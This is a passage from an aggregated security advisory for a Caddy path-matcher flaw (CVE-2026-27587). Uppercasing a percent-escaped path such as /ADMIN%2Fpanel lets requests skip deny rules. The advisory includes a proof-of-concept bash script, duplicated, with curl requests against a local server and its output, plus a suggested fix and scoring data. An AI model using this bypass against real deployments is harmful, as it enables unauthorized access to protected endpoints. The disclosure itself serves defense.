\nScript (Click to expand)\n\n```bash\n#!/usr/bin/env bash\nset -euo pipefail\n\nCADDY_BIN=\"/opt/caddy-2.10.2/caddy\"\nHOST=\"127.0.0.1\"\nPORT=\"8080\"\n\nTMPDIR=\"$(mktemp -d)\"\nCADDYFILE=\"${TMPDIR}/Caddyfile\"\nLOG=\"${TMPDIR}/caddy.log\"\n\ncleanup() {\n if [ -n \"${CADDY_PID:-}\" ] && kill -0 \"${CADDY_PID}\" 2>/dev/null; then\n kill \"${CADDY_PID}\" 2>/dev/null || true\n wait \"${CADDY_PID}\" 2>/dev/null || true\n fi\n rm -rf \"${TMPDIR}\" 2>/dev/null || true\n}\ntrap cleanup EXIT\n\nif [ ! -x \"${CADDY_BIN}\" ]; then\n echo \"error: missing caddy binary at ${CADDY_BIN}\" >&2\n exit 2\nfi\n\necho \"== Caddy version ==\"\n\"${CADDY_BIN}\" version\n\ncat >\"${CADDYFILE}\" <\"${LOG}\" 2>&1 &\nCADDY_PID=\"$!\"\n\nsleep 2\n\necho\necho \"== Request 1 (baseline - expect deny) ==\"\necho \"cmd: curl -v -H 'Host: example.test' http://${HOST}:${PORT}/admin%2Fpanel\"\ncurl -v -H \"Host: example.test\" \"http://${HOST}:${PORT}/admin%2Fpanel\" 2>&1 || true\n\necho\necho \"== Request 2 (BYPASS - expect allow) ==\"\necho \"cmd: curl -v -H 'Host: example.test' http://${HOST}:${PORT}/ADMIN%2Fpanel\"\ncurl -v -H \"Host: example.test\" \"http://${HOST}:${PORT}/ADMIN%2Fpanel\" 2>&1 || true\n\necho\necho \"== Stop Caddy ==\"\nkill \"${CADDY_PID}\" 2>/dev/null || true\nwait \"${CADDY_PID}\" 2>/dev/null || true\n\necho\necho \"== Full Caddy debug log ==\"\ncat \"${LOG}\"\n```\n
\n\n
\nExpected output (Click to expand)\n\n```bash\n== Caddy version ==\nv2.10.2 h1:g/gTYjGMD0dec+UgMw8SnfmJ3I9+M2TdvoRL/Ovu6U8=\n\n== Caddyfile ==\n{\n debug\n}\n\n:8080 {\n log\n @block {\n path /admin%2Fpanel\n }\n respond @block \"DENY\" 403\n respond \"ALLOW\" 200\n}\n\n== Start Caddy (debug + capture logs) ==\ncmd: /opt/caddy-2.10.2/caddy run --config /tmp/tmp.GXiRbxOnBN/Caddyfile --adapter caddyfile\n\n== Request 1 (baseline - expect deny) ==\ncmd: curl -v -H 'Host: example.test' http://127.0.0.1:8080/admin%2Fpanel\n* Trying 127.0.0.1:8080...\n* Connected to 127.0.0.1 (127.0.0.1) port 8080\n* using HTTP/1.x\n> GET /admin%2Fpanel HTTP/1.1\n> Host: example.test\n> User-Agent: curl/8.15.0\n> Accept: */*\n>\n* Request completely sent off\n< HTTP/1.1 403 Forbidden\n< Content-Type: text/plain; charset=utf-8\n< Server: Caddy\n< Date: Sun, 08 Feb 2026 22:19:20 GMT\n< Content-Length: 4\n<\n* Connection #0 to host 127.0.0.1 left intact\nDENY\n== Request 2 (BYPASS - expect allow) ==\ncmd: curl -v -H 'Host: example.test' http://127.0.0.1:8080/ADMIN%2Fpanel\n* Trying 127.0.0.1:8080...\n* Connected to 127.0.0.1 (127.0.0.1) port 8080\n* using HTTP/1.x\n> GET /ADMIN%2Fpanel HTTP/1.1\n> Host: example.test\n> User-Agent: curl/8.15.0\n> Accept: */*\n>\n* Request completely sent off\n< HTTP/1.1 200 OK\n< Content-Type: text/plain; charset=utf-8\n< Server: Caddy\n< Date: Sun, 08 Feb 2026 22:19:20 GMT\n< Content-Length: 5\n<\n* Connection #0 to host 127.0.0.1 left intact\nALLOW\n== Stop Caddy ==\n\n== Full Caddy debug log ==\n{\"level\":\"info\",\"ts\":1770589158.3687892,\"msg\":\"maxprocs: Leaving GOMAXPROCS=4: CPU quota undefined\"}\n{\"level\":\"info\",\"ts\":1770589158.3690693,\"msg\":\"GOMEMLIMIT is updated\",\"package\":\"github.com/KimMachineGun/automemlimit/memlimit\",\"GOMEMLIMIT\":1844136345,\"previous\":9223372036854775807}\n{\"level\":\"info\",\"ts\":1770589158.369109,\"msg\":\"using config from file\",\"file\":\"/tmp/tmp.GXiRbxOnBN/Caddyfile\"}\n{\"level\":\"info\",\"ts\":1770589158.3704133,\"msg\":\"adapted config to JSON\",\"adapter\":\"caddyfile\"}\n{\"level\":\"warn\",\"ts\":1770589158.370424,\"msg\":\"Caddyfile input is not formatted; run 'caddy fmt --overwrite' to fix inconsistencies\",\"adapter\":\"caddyfile\",\"file\":\"/tmp/tmp.GXiRbxOnBN/Caddyfile\",\"line\":2}\n{\"level\":\"info\",\"ts\":1770589158.3715324,\"logger\":\"admin\",\"msg\":\"admin endpoint started\",\"address\":\"localhost:2019\",\"enforce_origin\":false,\"origins\":[\"//localhost:2019\",\"//[::1]:2019\",\"//127.0.0.1:2019\"]}\n{\"level\":\"debug\",\"ts\":1770589158.3716462,\"logger\":\"http.auto_https\",\"msg\":\"adjusted config\",\"tls\":{\"automation\":{\"policies\":[{}]}},\"http\":{\"servers\":{\"srv0\":{\"listen\":[\":8080\"],\"routes\":[{\"handle\":[{\"body\":\"DENY\",\"handler\":\"static_response\",\"status_code\":403}]},{\"handle\":[{\"body\":\"ALLOW\",\"handler\":\"static_response\",\"status_code\":200}]}],\"automatic_https\":{},\"logs\":{}}}}}\n{\"level\":\"debug\",\"ts\":1770589158.3718414,\"logger\":\"http\",\"msg\":\"starting server loop\",\"address\":\"[::]:8080\",\"tls\":false,\"http3\":false}\n{\"level\":\"warn\",\"ts\":1770589158.371858,\"logger\":\"http\",\"msg\":\"HTTP/2 skipped because it requires TLS\",\"network\":\"tcp\",\"addr\":\":8080\"}\n{\"level\":\"warn\",\"ts\":1770589158.3718607,\"logger\":\"http\",\"msg\":\"HTTP/3 skipped because it requires TLS\",\"network\":\"tcp\",\"addr\":\":8080\"}\n{\"level\":\"info\",\"ts\":1770589158.3718636,\"logger\":\"http.log\",\"msg\":\"server running\",\"name\":\"srv0\",\"protocols\":[\"h1\",\"h2\",\"h3\"]}\n{\"level\":\"debug\",\"ts\":1770589158.3718896,\"logger\":\"events\",\"msg\":\"event\",\"name\":\"started\",\"id\":\"6bb8b6fe-4980-4a48-9f7e-2146ecd48ce6\",\"origin\":\"\",\"data\":null}\n{\"level\":\"info\",\"ts\":1770589158.3720388,\"msg\":\"autosaved config (load with --resume flag)\",\"file\":\"/home/vh/.config/caddy/autosave.json\"}\n{\"level\":\"info\",\"ts\":1770589158.3720443,\"msg\":\"serving initial configuration\"}\n{\"level\":\"info\",\"ts\":1770589158.372355,\"logger\":\"tls.cache.maintenance\",\"msg\":\"started background certificate maintenance\",\"cache\":\"0xc00064d180\"}\n{\"level\":\"info\",\"ts\":1770589158.3855736,\"logger\":\"tls\",\"msg\":\"storage cleaning happened too recently; skipping for now\",\"storage\":\"FileStorage:/home/vh/.local/share/caddy\",\"instance\":\"a259f82d-3c7c-4706-9ca8-17456b4af729\",\"try_again\":1770675558.3855705,\"try_again_in\":86399.999999388}\n{\"level\":\"info\",\"ts\":1770589158.3857276,\"logger\":\"tls\",\"msg\":\"finished cleaning storage units\"}\n{\"level\":\"info\",\"ts\":1770589160.2764065,\"logger\":\"http.log.access\",\"msg\":\"handled request\",\"request\":{\"remote_ip\":\"127.0.0.1\",\"remote_port\":\"57126\",\"client_ip\":\"127.0.0.1\",\"proto\":\"HTTP/1.1\",\"method\":\"GET\",\"host\":\"example.test\",\"uri\":\"/admin%2Fpanel\",\"headers\":{\"User-Agent\":[\"curl/8.15.0\"],\"Accept\":[\"*/*\"]}},\"bytes_read\":0,\"user_id\":\"\",\"duration\":0.000017493,\"size\":4,\"status\":403,\"resp_headers\":{\"Server\":[\"Caddy\"],\"Content-Type\":[\"text/plain; charset=utf-8\"]}}\n{\"level\":\"info\",\"ts\":1770589160.2943857,\"logger\":\"http.log.access\",\"msg\":\"handled request\",\"request\":{\"remote_ip\":\"127.0.0.1\",\"remote_port\":\"57136\",\"client_ip\":\"127.0.0.1\",\"proto\":\"HTTP/1.1\",\"method\":\"GET\",\"host\":\"example.test\",\"uri\":\"/ADMIN%2Fpanel\",\"headers\":{\"User-Agent\":[\"curl/8.15.0\"],\"Accept\":[\"*/*\"]}},\"bytes_read\":0,\"user_id\":\"\",\"duration\":0.000066734,\"size\":5,\"status\":200,\"resp_headers\":{\"Server\":[\"Caddy\"],\"Content-Type\":[\"text/plain; charset=utf-8\"]}}\n{\"level\":\"info\",\"ts\":1770589160.2966497,\"msg\":\"shutting down apps, then terminating\",\"signal\":\"SIGTERM\"}\n{\"level\":\"warn\",\"ts\":1770589160.2966666,\"msg\":\"exiting; byeee!! 👋\",\"signal\":\"SIGTERM\"}\n{\"level\":\"debug\",\"ts\":1770589160.296728,\"logger\":\"events\",\"msg\":\"event\",\"name\":\"stopping\",\"id\":\"aefb0a2f-0a81-4587-9f79-e530883c3fe1\",\"origin\":\"\",\"data\":null}\n{\"level\":\"info\",\"ts\":1770589160.2967443,\"logger\":\"http\",\"msg\":\"servers shutting down with eternal grace period\"}\n{\"level\":\"info\",\"ts\":1770589160.2968848,\"logger\":\"admin\",\"msg\":\"stopped previous server\",\"address\":\"localhost:2019\"}\n{\"level\":\"info\",\"ts\":1770589160.2968912,\"msg\":\"shutdown complete\",\"signal\":\"SIGTERM\",\"exit_code\":0}\n```\n
\n\n\n### Impact\nThis is a route/auth bypass in Caddy's path-matching logic for patterns that include escape sequences. Deployments that use `path` matchers with `%xx` patterns to block or protect sensitive endpoints (including encoded-path variants such as encoded slashes) can be bypassed by changing the casing of the request path, allowing unauthorized access to sensitive endpoints behind Caddy depending on upstream configuration.\n\nThe reproduction is minimal per the reporting guidance. In a realistic \"full\" scenario, a deployment may block `%xx` variants like `path /admin%2Fpanel`, otherwise proxying. If the backend is case-insensitive/normalizing, `/ADMIN%2Fpanel` maps to the same handler; Caddy’s `%`-pattern match misses due to case, so the block is skipped and the request falls through.\n\n\n### AI Use Disclosure\nA custom AI agent pipeline was used to discover the vulnerability, after which was manually reproduced and validated each step. The entire report was ran through an LLM to make sure nothing obvious was missed.\n\n### Disclosure/crediting\n\nAsim Viladi Oglu Manizada", "title": "github - https://github.com/advisories/GHSA-g7pc-pc7g-h8jh" }, { "category": "description", "text": "### Summary\nCaddy's HTTP `path` request matcher is intended to be case-insensitive, but when the match pattern contains percent-escape sequences (`%xx`) it compares against the request's escaped path without lowercasing. An attacker can bypass path-based routing and any access controls attached to that route by changing the casing of the request path.\n\n### Details\nIn Caddy `v2.10.2`, `MatchPath` is explicitly designed to be case-insensitive and lowercases match patterns during provisioning:\n\n- `modules/caddyhttp/matchers.go`: rationale captured in the `MatchPath` comment.\n- `MatchPath.Provision` lowercases configured patterns via `strings.ToLower`.\n- `MatchPath.MatchWithError` lowercases the request path for the normal matching path: `reqPath := strings.ToLower(r.URL.Path)`.\n\nBut when a match pattern contains a percent sign (`%`), `MatchPath.MatchWithError` switches to \"escaped space\" matching and builds the comparison string from `r.URL.EscapedPath()`:\n\n- `reqPathForPattern := CleanPath(r.URL.EscapedPath(), mergeSlashes)`\n- If it doesn't match, it `continue`s (skipping the remaining matching logic for that pattern).\n\nBecause `r.URL.EscapedPath()` is not lowercased, case differences in the request path can cause the escaped-space match to fail even though `MatchPath` is meant to be case-insensitive. For example, with a pattern of `/admin%2Fpanel`:\n\n- Requesting `/admin%2Fpanel` matches and can be denied as intended.\n- Requesting `/ADMIN%2Fpanel` does not match and falls through to other routes/handlers.\n\n#### Suggested fix\n- In the `%`-pattern matching path, ensure the effective string passed to `path.Match` is lowercased (same as the normal branch).\n - Simplest seems to lowercase the constructed string in `matchPatternWithEscapeSequence` right before `path.Match`.\n\nReproduced on:\n- Stable release: `v2.10.2` -- this is the release referenced in the reproduction below.\n- Dev build: `v2.11.0-beta.2`.\n- Master tip: commit `58968b3fd38cacbf4b5e07cc8c8be27696dce60f`.\n\n### PoC\nPrereqs:\n- bash, curl\n- A pre-built Caddy binary available at `/opt/caddy-2.10.2/caddy` (edit `CADDY_BIN` in the script if needed)\n\n\n
\nScript (Click to expand)\n\n```bash\n#!/usr/bin/env bash\nset -euo pipefail\n\nCADDY_BIN=\"/opt/caddy-2.10.2/caddy\"\nHOST=\"127.0.0.1\"\nPORT=\"8080\"\n\nTMPDIR=\"$(mktemp -d)\"\nCADDYFILE=\"${TMPDIR}/Caddyfile\"\nLOG=\"${TMPDIR}/caddy.log\"\n\ncleanup() {\n if [ -n \"${CADDY_PID:-}\" ] && kill -0 \"${CADDY_PID}\" 2>/dev/null; then\n kill \"${CADDY_PID}\" 2>/dev/null || true\n wait \"${CADDY_PID}\" 2>/dev/null || true\n fi\n rm -rf \"${TMPDIR}\" 2>/dev/null || true\n}\ntrap cleanup EXIT\n\nif [ ! -x \"${CADDY_BIN}\" ]; then\n echo \"error: missing caddy binary at ${CADDY_BIN}\" >&2\n exit 2\nfi\n\necho \"== Caddy version ==\"\n\"${CADDY_BIN}\" version\n\ncat >\"${CADDYFILE}\" <\"${LOG}\" 2>&1 &\nCADDY_PID=\"$!\"\n\nsleep 2\n\necho\necho \"== Request 1 (baseline - expect deny) ==\"\necho \"cmd: curl -v -H 'Host: example.test' http://${HOST}:${PORT}/admin%2Fpanel\"\ncurl -v -H \"Host: example.test\" \"http://${HOST}:${PORT}/admin%2Fpanel\" 2>&1 || true\n\necho\necho \"== Request 2 (BYPASS - expect allow) ==\"\necho \"cmd: curl -v -H 'Host: example.test' http://${HOST}:${PORT}/ADMIN%2Fpanel\"\ncurl -v -H \"Host: example.test\" \"http://${HOST}:${PORT}/ADMIN%2Fpanel\" 2>&1 || true\n\necho\necho \"== Stop Caddy ==\"\nkill \"${CADDY_PID}\" 2>/dev/null || true\nwait \"${CADDY_PID}\" 2>/dev/null || true\n\necho\necho \"== Full Caddy debug log ==\"\ncat \"${LOG}\"\n```\n
\n\n
\nExpected output (Click to expand)\n\n```bash\n== Caddy version ==\nv2.10.2 h1:g/gTYjGMD0dec+UgMw8SnfmJ3I9+M2TdvoRL/Ovu6U8=\n\n== Caddyfile ==\n{\n debug\n}\n\n:8080 {\n log\n @block {\n path /admin%2Fpanel\n }\n respond @block \"DENY\" 403\n respond \"ALLOW\" 200\n}\n\n== Start Caddy (debug + capture logs) ==\ncmd: /opt/caddy-2.10.2/caddy run --config /tmp/tmp.GXiRbxOnBN/Caddyfile --adapter caddyfile\n\n== Request 1 (baseline - expect deny) ==\ncmd: curl -v -H 'Host: example.test' http://127.0.0.1:8080/admin%2Fpanel\n* Trying 127.0.0.1:8080...\n* Connected to 127.0.0.1 (127.0.0.1) port 8080\n* using HTTP/1.x\n> GET /admin%2Fpanel HTTP/1.1\n> Host: example.test\n> User-Agent: curl/8.15.0\n> Accept: */*\n>\n* Request completely sent off\n< HTTP/1.1 403 Forbidden\n< Content-Type: text/plain; charset=utf-8\n< Server: Caddy\n< Date: Sun, 08 Feb 2026 22:19:20 GMT\n< Content-Length: 4\n<\n* Connection #0 to host 127.0.0.1 left intact\nDENY\n== Request 2 (BYPASS - expect allow) ==\ncmd: curl -v -H 'Host: example.test' http://127.0.0.1:8080/ADMIN%2Fpanel\n* Trying 127.0.0.1:8080...\n* Connected to 127.0.0.1 (127.0.0.1) port 8080\n* using HTTP/1.x\n> GET /ADMIN%2Fpanel HTTP/1.1\n> Host: example.test\n> User-Agent: curl/8.15.0\n> Accept: */*\n>\n* Request completely sent off\n< HTTP/1.1 200 OK\n< Content-Type: text/plain; charset=utf-8\n< Server: Caddy\n< Date: Sun, 08 Feb 2026 22:19:20 GMT\n< Content-Length: 5\n<\n* Connection #0 to host 127.0.0.1 left intact\nALLOW\n== Stop Caddy ==\n\n== Full Caddy debug log ==\n{\"level\":\"info\",\"ts\":1770589158.3687892,\"msg\":\"maxprocs: Leaving GOMAXPROCS=4: CPU quota undefined\"}\n{\"level\":\"info\",\"ts\":1770589158.3690693,\"msg\":\"GOMEMLIMIT is updated\",\"package\":\"github.com/KimMachineGun/automemlimit/memlimit\",\"GOMEMLIMIT\":1844136345,\"previous\":9223372036854775807}\n{\"level\":\"info\",\"ts\":1770589158.369109,\"msg\":\"using config from file\",\"file\":\"/tmp/tmp.GXiRbxOnBN/Caddyfile\"}\n{\"level\":\"info\",\"ts\":1770589158.3704133,\"msg\":\"adapted config to JSON\",\"adapter\":\"caddyfile\"}\n{\"level\":\"warn\",\"ts\":1770589158.370424,\"msg\":\"Caddyfile input is not formatted; run 'caddy fmt --overwrite' to fix inconsistencies\",\"adapter\":\"caddyfile\",\"file\":\"/tmp/tmp.GXiRbxOnBN/Caddyfile\",\"line\":2}\n{\"level\":\"info\",\"ts\":1770589158.3715324,\"logger\":\"admin\",\"msg\":\"admin endpoint started\",\"address\":\"localhost:2019\",\"enforce_origin\":false,\"origins\":[\"//localhost:2019\",\"//[::1]:2019\",\"//127.0.0.1:2019\"]}\n{\"level\":\"debug\",\"ts\":1770589158.3716462,\"logger\":\"http.auto_https\",\"msg\":\"adjusted config\",\"tls\":{\"automation\":{\"policies\":[{}]}},\"http\":{\"servers\":{\"srv0\":{\"listen\":[\":8080\"],\"routes\":[{\"handle\":[{\"body\":\"DENY\",\"handler\":\"static_response\",\"status_code\":403}]},{\"handle\":[{\"body\":\"ALLOW\",\"handler\":\"static_response\",\"status_code\":200}]}],\"automatic_https\":{},\"logs\":{}}}}}\n{\"level\":\"debug\",\"ts\":1770589158.3718414,\"logger\":\"http\",\"msg\":\"starting server loop\",\"address\":\"[::]:8080\",\"tls\":false,\"http3\":false}\n{\"level\":\"warn\",\"ts\":1770589158.371858,\"logger\":\"http\",\"msg\":\"HTTP/2 skipped because it requires TLS\",\"network\":\"tcp\",\"addr\":\":8080\"}\n{\"level\":\"warn\",\"ts\":1770589158.3718607,\"logger\":\"http\",\"msg\":\"HTTP/3 skipped because it requires TLS\",\"network\":\"tcp\",\"addr\":\":8080\"}\n{\"level\":\"info\",\"ts\":1770589158.3718636,\"logger\":\"http.log\",\"msg\":\"server running\",\"name\":\"srv0\",\"protocols\":[\"h1\",\"h2\",\"h3\"]}\n{\"level\":\"debug\",\"ts\":1770589158.3718896,\"logger\":\"events\",\"msg\":\"event\",\"name\":\"started\",\"id\":\"6bb8b6fe-4980-4a48-9f7e-2146ecd48ce6\",\"origin\":\"\",\"data\":null}\n{\"level\":\"info\",\"ts\":1770589158.3720388,\"msg\":\"autosaved config (load with --resume flag)\",\"file\":\"/home/vh/.config/caddy/autosave.json\"}\n{\"level\":\"info\",\"ts\":1770589158.3720443,\"msg\":\"serving initial configuration\"}\n{\"level\":\"info\",\"ts\":1770589158.372355,\"logger\":\"tls.cache.maintenance\",\"msg\":\"started background certificate maintenance\",\"cache\":\"0xc00064d180\"}\n{\"level\":\"info\",\"ts\":1770589158.3855736,\"logger\":\"tls\",\"msg\":\"storage cleaning happened too recently; skipping for now\",\"storage\":\"FileStorage:/home/vh/.local/share/caddy\",\"instance\":\"a259f82d-3c7c-4706-9ca8-17456b4af729\",\"try_again\":1770675558.3855705,\"try_again_in\":86399.999999388}\n{\"level\":\"info\",\"ts\":1770589158.3857276,\"logger\":\"tls\",\"msg\":\"finished cleaning storage units\"}\n{\"level\":\"info\",\"ts\":1770589160.2764065,\"logger\":\"http.log.access\",\"msg\":\"handled request\",\"request\":{\"remote_ip\":\"127.0.0.1\",\"remote_port\":\"57126\",\"client_ip\":\"127.0.0.1\",\"proto\":\"HTTP/1.1\",\"method\":\"GET\",\"host\":\"example.test\",\"uri\":\"/admin%2Fpanel\",\"headers\":{\"User-Agent\":[\"curl/8.15.0\"],\"Accept\":[\"*/*\"]}},\"bytes_read\":0,\"user_id\":\"\",\"duration\":0.000017493,\"size\":4,\"status\":403,\"resp_headers\":{\"Server\":[\"Caddy\"],\"Content-Type\":[\"text/plain; charset=utf-8\"]}}\n{\"level\":\"info\",\"ts\":1770589160.2943857,\"logger\":\"http.log.access\",\"msg\":\"handled request\",\"request\":{\"remote_ip\":\"127.0.0.1\",\"remote_port\":\"57136\",\"client_ip\":\"127.0.0.1\",\"proto\":\"HTTP/1.1\",\"method\":\"GET\",\"host\":\"example.test\",\"uri\":\"/ADMIN%2Fpanel\",\"headers\":{\"User-Agent\":[\"curl/8.15.0\"],\"Accept\":[\"*/*\"]}},\"bytes_read\":0,\"user_id\":\"\",\"duration\":0.000066734,\"size\":5,\"status\":200,\"resp_headers\":{\"Server\":[\"Caddy\"],\"Content-Type\":[\"text/plain; charset=utf-8\"]}}\n{\"level\":\"info\",\"ts\":1770589160.2966497,\"msg\":\"shutting down apps, then terminating\",\"signal\":\"SIGTERM\"}\n{\"level\":\"warn\",\"ts\":1770589160.2966666,\"msg\":\"exiting; byeee!! 👋\",\"signal\":\"SIGTERM\"}\n{\"level\":\"debug\",\"ts\":1770589160.296728,\"logger\":\"events\",\"msg\":\"event\",\"name\":\"stopping\",\"id\":\"aefb0a2f-0a81-4587-9f79-e530883c3fe1\",\"origin\":\"\",\"data\":null}\n{\"level\":\"info\",\"ts\":1770589160.2967443,\"logger\":\"http\",\"msg\":\"servers shutting down with eternal grace period\"}\n{\"level\":\"info\",\"ts\":1770589160.2968848,\"logger\":\"admin\",\"msg\":\"stopped previous server\",\"address\":\"localhost:2019\"}\n{\"level\":\"info\",\"ts\":1770589160.2968912,\"msg\":\"shutdown complete\",\"signal\":\"SIGTERM\",\"exit_code\":0}\n```\n
\n\n\n### Impact\nThis is a route/auth bypass in Caddy's path-matching logic for patterns that include escape sequences. Deployments that use `path` matchers with `%xx` patterns to block or protect sensitive endpoints (including encoded-path variants such as encoded slashes) can be bypassed by changing the casing of the request path, allowing unauthorized access to sensitive endpoints behind Caddy depending on upstream configuration.\n\nThe reproduction is minimal per the reporting guidance. In a realistic \"full\" scenario, a deployment may block `%xx` variants like `path /admin%2Fpanel`, otherwise proxying. If the backend is case-insensitive/normalizing, `/ADMIN%2Fpanel` maps to the same handler; Caddy’s `%`-pattern match misses due to case, so the block is skipped and the request falls through.\n\n\n### AI Use Disclosure\nA custom AI agent pipeline was used to discover the vulnerability, after which was manually reproduced and validated each step. The entire report was ran through an LLM to make sure nothing obvious was missed.\n\n### Disclosure/crediting\n\nAsim Viladi Oglu Manizada", "title": "osv - https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Go%2FGHSA-g7pc-pc7g-h8jh.json?alt=media" }, { "category": "description", "text": "Caddy is an extensible server platform that uses TLS by default. Prior to version 2.11.1, Caddy's HTTP `path` request matcher is intended to be case-insensitive, but when the match pattern contains percent-escape sequences (`%xx`) it compares against the request's escaped path without lowercasing. An attacker can bypass path-based routing and any access controls attached to that route by changing the casing of the request path. Version 2.11.1 contains a fix for the issue.", "title": "osv - https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/GIT%2FCVE-2026-27587.json?alt=media" }, { "category": "description", "text": "Caddy is an extensible server platform that uses TLS by default. Prior to version 2.11.1, Caddy's HTTP `path` request matcher is intended to be case-insensitive, but when the match pattern contains percent-escape sequences (`%xx`) it compares against the request's escaped path without lowercasing. An attacker can bypass path-based routing and any access controls attached to that route by changing the casing of the request path. Version 2.11.1 contains a fix for the issue.", "title": "debian - https://security-tracker.debian.org/tracker/CVE-2026-27587" }, { "category": "description", "text": "Caddy MatchPath %xx branch skips case normalization in github.com/caddyserver/caddy/v2", "title": "osv - https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Go%2FGO-2026-4538.json?alt=media" }, { "category": "description", "text": "Caddy is an extensible server platform that uses TLS by default. Prior to version 2.11.1, Caddy's HTTP `path` request matcher is intended to be case-insensitive, but when the match pattern contains percent-escape sequences (`%xx`) it compares against the request's escaped path without lowercasing. An attacker can bypass path-based routing and any access controls attached to that route by changing the casing of the request path. Version 2.11.1 contains a fix for the issue.", "title": "osv - https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Ubuntu%2FUBUNTU-CVE-2026-27587.json?alt=media" }, { "category": "description", "text": "Caddy's HTTP `path` request matcher is intended to be case-insensitive, but when the match pattern contains percent-escape sequences (`%xx`) it compares against the request's escaped path without lowercasing. An attacker can bypass path-based routing and any access controls attached to that route by changing the casing of the request path.", "title": "gitlab - https://gitlab.com/api/v4/projects/25847700/repository/files/go%2Fgithub.com%2Fcaddyserver%2Fcaddy%2Fv2%2FCVE-2026-27587.yml/raw" }, { "category": "description", "text": "Caddy's HTTP `path` request matcher is intended to be case-insensitive, but when the match pattern contains percent-escape sequences (`%xx`) it compares against the request's escaped path without lowercasing. An attacker can bypass path-based routing and any access controls attached to that route by changing the casing of the request path.", "title": "gitlab - https://gitlab.com/api/v4/projects/25847700/repository/files/go%2Fgithub.com%2Fcaddyserver%2Fcaddy%2Fv2%2Fmodules%2Fcaddyhttp%2FCVE-2026-27587.yml/raw" }, { "category": "other", "text": "0.0004", "title": "EPSS" }, { "category": "other", "text": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P", "title": "CVSSV4" }, { "category": "other", "text": "7.7", "title": "CVSSV4 base score" }, { "category": "other", "text": "3.8", "title": "NCSC Score" }, { "category": "other", "text": "Is related to (a version of) an uncommon product, There is exploit data available from source Nvd", "title": "NCSC Score top decreasing factors" } ], "product_status": { "fixed": [ "CSAFPID-5918973", "CSAFPID-5918975" ], "known_affected": [ "CSAFPID-5688699", "CSAFPID-5700114", "CSAFPID-4034332", "CSAFPID-4034342", "CSAFPID-4034343", "CSAFPID-4034344", "CSAFPID-4034345", "CSAFPID-4034346", "CSAFPID-4034347", "CSAFPID-4034348", "CSAFPID-4034349", "CSAFPID-4034350", "CSAFPID-4034351", "CSAFPID-4034352", "CSAFPID-4034353", "CSAFPID-4034354", "CSAFPID-4034355", "CSAFPID-4034356", "CSAFPID-4034357", "CSAFPID-4034358", "CSAFPID-4034359", "CSAFPID-4034360", "CSAFPID-4034361", "CSAFPID-4034362", "CSAFPID-4034363", "CSAFPID-4034364", "CSAFPID-4034378", "CSAFPID-4034379", "CSAFPID-4034380", "CSAFPID-4034387", "CSAFPID-4034396", "CSAFPID-4034400", "CSAFPID-4034401", "CSAFPID-4034402", "CSAFPID-4034407", "CSAFPID-4034411", "CSAFPID-4034417", "CSAFPID-4034418", "CSAFPID-4034419", "CSAFPID-4034420", "CSAFPID-4034435", "CSAFPID-4034436", "CSAFPID-4034437", "CSAFPID-4034438", "CSAFPID-4034441", "CSAFPID-4034447", "CSAFPID-4034448", "CSAFPID-4034449", "CSAFPID-4034450", "CSAFPID-4034451", "CSAFPID-4034455", "CSAFPID-4034456", "CSAFPID-4034457", "CSAFPID-4034464", "CSAFPID-4034465", "CSAFPID-4034466", "CSAFPID-4034467", "CSAFPID-4034468", "CSAFPID-4034469", "CSAFPID-4034470", "CSAFPID-4034471", "CSAFPID-4034472", "CSAFPID-4034473", "CSAFPID-4034474", "CSAFPID-4034475", "CSAFPID-4034476", "CSAFPID-4034477", "CSAFPID-4034478", "CSAFPID-4034479", "CSAFPID-4034480", "CSAFPID-4034481", "CSAFPID-4034482", "CSAFPID-5700154", "CSAFPID-5700155", "CSAFPID-5700156", "CSAFPID-5700157", "CSAFPID-5700158", "CSAFPID-5700159", "CSAFPID-5700160", "CSAFPID-5700161", "CSAFPID-5700162", "CSAFPID-5700163", "CSAFPID-5700164", "CSAFPID-5700165", "CSAFPID-5700166", "CSAFPID-5700167", "CSAFPID-5700168", "CSAFPID-5700169", "CSAFPID-5700170", "CSAFPID-5700171", "CSAFPID-5700172", "CSAFPID-5700173", "CSAFPID-5700174", "CSAFPID-5700175", "CSAFPID-5700176", "CSAFPID-5700177", "CSAFPID-5700549", "CSAFPID-5706479", "CSAFPID-5735034", "CSAFPID-5735035", "CSAFPID-5735036", "CSAFPID-5735037", "CSAFPID-5913749", "CSAFPID-5913750", "CSAFPID-5913751", "CSAFPID-5913752", "CSAFPID-5913753", "CSAFPID-5913754", "CSAFPID-5913755", "CSAFPID-5913756", "CSAFPID-5913757", "CSAFPID-5913758", "CSAFPID-5913759", "CSAFPID-5913760", "CSAFPID-5918974", "CSAFPID-5918976" ] }, "references": [ { "category": "external", "summary": "Source - cveprojectv5", "url": "https://www.cve.org/CVERecord?id=CVE-2026-27587" }, { "category": "external", "summary": "Source raw - cveprojectv5", "url": "https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/27xxx/CVE-2026-27587.json" }, { "category": "external", "summary": "Source - nvd", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27587" }, { "category": "external", "summary": "Source raw - nvd", "url": "https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-27587" }, { "category": "external", "summary": "Source - github", "url": "https://github.com/advisories/GHSA-g7pc-pc7g-h8jh" }, { "category": "external", "summary": "Source raw - github", "url": "https://api.github.com/advisories/GHSA-g7pc-pc7g-h8jh" }, { "category": "external", "summary": "Source - osv", "url": "https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Go%2FGHSA-g7pc-pc7g-h8jh.json?alt=media" }, { "category": "external", "summary": "Source - osv", "url": "https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/GIT%2FCVE-2026-27587.json?alt=media" }, { "category": "external", "summary": "Source - debian", "url": "https://security-tracker.debian.org/tracker/CVE-2026-27587" }, { "category": "external", "summary": "Source - first", "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-27587" }, { "category": "external", "summary": "Source raw - first", "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0" }, { "category": "external", "summary": "Source - osv", "url": "https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Go%2FGO-2026-4538.json?alt=media" }, { "category": "external", "summary": "Source - first", "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0" }, { "category": 